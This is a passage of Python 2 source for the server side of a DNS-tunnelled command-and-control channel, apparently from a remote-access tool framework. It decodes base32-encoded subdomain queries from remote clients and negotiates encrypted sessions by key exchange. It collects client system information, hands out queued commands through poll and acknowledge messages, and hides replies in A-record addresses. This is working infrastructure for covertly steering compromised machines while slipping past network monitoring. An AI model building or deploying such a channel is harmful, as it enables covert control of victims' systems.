            bits = ( struct.unpack('>I', '\x00'+part+chr(random.randrange(0, 255))*(3-len(part)))[0] ) << 1
            packed = struct.unpack('!BBBB', struct.pack('>I', header | idx | bits | int(not bool(bits & 6))))
            address = '.'.join(['{}'.format(int(x)) for x in packed])
            response.append(RR('.', QTYPE.A, rdata=A(address), ttl=600))

        return response

    def _q_page_decoder(self, data):
        parts = data.stripSuffix(self.domain).idna()[:-1].split('.')

        if len(parts) == 0:
            raise DnsPingRequest(1)
        elif len(parts) == 1 and parts[0].startswith('ping'):
            if len(parts[0]) == 4:
                raise DnsPingRequest(15)
            else:
                raise DnsPingRequest(int(parts[0][4:]))

        elif len(parts) not in (2,3):
            raise DnsNoCommandServerException()

        parts = [
            base64.b32decode(''.join([
                self.translation[x] for x in part
            ])) for part in parts
        ]

        if len(parts) == 2:
            nonce, data = parts
            nonce = struct.unpack('>I', nonce)[0]
            encoder = self.encoder
            session = None
        elif len(parts) == 3:
            spi, nonce, data = parts
            spi = struct.unpack('>I', spi)[0]
            nonce = struct.unpack('>I', nonce)[0]
            session = None
            with self.lock:
                if not spi in self.sessions:
                    raise DnsCommandServerException('NO_SESSION', nonce)
                session = self.sessions[spi]
            encoder = session.encoder

        return encoder.decode(data, nonce, symmetric=True), session, nonce


    def _cmd_processor(self, command, session):
        logging.debug('dnscnc:commands={} session={}'.format(command, session))

        if isinstance(command, Poll) and session is None:
            return [Policy(self.interval, self.kex), Poll()]

        elif isinstance(command, Ack) and (session is None):
            return [Ack()]

        elif isinstance(command, Exit):
            if session and session.system_info:
                self.on_exit(session.system_info)

            with self.lock:
                del self.sessions[session.spi]

            return [Exit()]

        elif (
                isinstance(command, Poll) or isinstance(command, SystemStatus)
            ) and (session is not None):
            if session.system_info:
                self.on_keep_alive(session.system_info)

            if isinstance(command, SystemStatus):
                session.system_status = command.get_dict()

            commands = session.commands
            return commands

        elif isinstance(command, Ack) and (session is not None):
            if session.system_info:
                self.on_keep_alive(session.system_info)

            if command.amount > len(session.commands):
                logging.info('ACK: invalid amount of commands: {} > {}'.format(
                    command.amount, len(session.commands)))
            session.commands = session.commands[command.amount:]
            return [Ack()]

        elif isinstance(command, SystemInfo) and session is not None:
            session.system_info = command.get_dict()
            return [Ack()]

        elif isinstance(command, Kex):
            with self.lock:
                response = []

                if not command.spi in self.sessions:
                    self.sessions[command.spi] = Session(
                        command.spi,
                        self.encoder.clone(),
                        self.commands,
                        self.timeout
                    )

                encoder = self.sessions[command.spi].encoder
                response, key = encoder.process_kex_request(command.parcel)
                logging.debug('dnscnc:kex:key={}'.format(binascii.b2a_hex(key[0])))

            return [Kex(response)]
        else:
            return [Error('NO_POLICY')]

    def resolve(self, request, handler):
        if request.q.qtype != QTYPE.A:
            reply = request.reply()
            reply.header.rcode = RCODE.NXDOMAIN
            logging.debug('Request unknown qtype: {}'.format(QTYPE.get(request.q.qtype)))
            return reply

        with self.lock:
            data = request.q.qname
            part = data.stripSuffix(self.domain).idna()[:-1]
            if part in self.cache:
                response = self.cache[part]
                response.header.id = request.header.id
                return self.cache[part]

            response = self._resolve(request, handler)
            self.cache[part] = response
            return response

    def _resolve(self, request, handler):
        qname = request.q.qname
        reply = request.reply()

        # TODO:
        # Resolve NS?, DS, SOA somehow
        if not qname.matchSuffix(self.domain):
            if self.recursor:
                try:
                    return DNSRecord.parse(request.send(self.recursor, timeout=2))
                except socket.error:
                    pass
                except Exception as e:
                    logging.exception('DNS request forwarding failed')

            reply.header.rcode = RCODE.NXDOMAIN
            return reply

        responses = []

        session = None
        nonce = None

        try:
            request, session, nonce = self._q_page_decoder(qname)
            if session and session.last_nonce and session.last_qname:
                if nonce < session.last_nonce:
                    logging.info('Ignore nonce from past: {} < {}'.format(
                        nonce, session.last_nonce))
                    reply.header.rcode = RCODE.NXDOMAIN
                    return reply
                elif session.last_nonce == nonce and session.last_qname != qname:
                    logging.info('Last nonce but different qname: {} != {}'.format(
                        session.last_qname, qname))
                    reply.header.rcode = RCODE.NXDOMAIN
                    return reply

            for command in Parcel.unpack(request):
                for response in self._cmd_processor(command, session):
                    responses.append(response)

            if session:
                session.last_nonce = nonce
                session.last_qname = qname

        except DnsCommandServerException as e:
            nonce = e.nonce
            responses = [e.error, Policy(self.interval, self.kex), Poll()]

        except ParcelInvalidCrc as e:
            responses = [e.error]

        except DnsNoCommandServerException:
            reply.header.rcode = RCODE.NXDOMAIN
            return reply

        except DnsPingRequest, e:
            for i in xrange(e.args[0]):
                x = (i % 65536) >> 8
                y = i % 256
                a = RR('.', QTYPE.A, rdata=A('127.0.{}.{}'.format(x, y)), ttl=10)
                a.rname = qname
                reply.add_answer(a)

            return reply

        except TypeError:
            # Usually - invalid padding
            reply.header.rcode = RCODE.NXDOMAIN
            return reply